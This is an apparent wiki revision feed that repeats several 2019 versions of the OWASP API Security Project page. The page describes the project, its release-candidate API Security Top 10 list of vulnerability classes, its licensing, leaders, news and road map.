&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254718</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254718"/>
				<updated>2019-09-13T13:18:01Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and will be presented in-depth during [https://globalappsecdc2019.sched.com/event/SxDz/api-security-project Global AppSec DC 2019].&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/raw/master/2019/en/dist/owasp-api-security-top-10.pdf PDF version of API Security Top-10]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
=== Sep 13, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://dc.globalappsec.org/ OWASP Global AppSec DC]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC.pdf|thumb|Presentation - API Security Top 10 RC]]&lt;br /&gt;
&lt;br /&gt;
=== May 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254715</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254715"/>
				<updated>2019-09-13T13:15:13Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and will be presented in-depth during [https://globalappsecdc2019.sched.com/event/SxDz/api-security-project Global AppSec DC 2019].&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
=== Sep 13, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://dc.globalappsec.org/ OWASP Global AppSec DC]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC.pdf|thumb|Presentation - API Security Top 10 RC]]&lt;br /&gt;
&lt;br /&gt;
=== May 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:API_Security_Top_10_RC.pdf&amp;diff=254714</id>
		<title>File:API Security Top 10 RC.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:API_Security_Top_10_RC.pdf&amp;diff=254714"/>
				<updated>2019-09-13T13:12:29Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;API Security Top 10 RC&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254689</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=254689"/>
				<updated>2019-09-12T12:35:57Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added summary of Top 10 RC&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and will be presented in-depth during [https://globalappsecdc2019.sched.com/event/SxDz/api-security-project Global AppSec DC 2019].&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
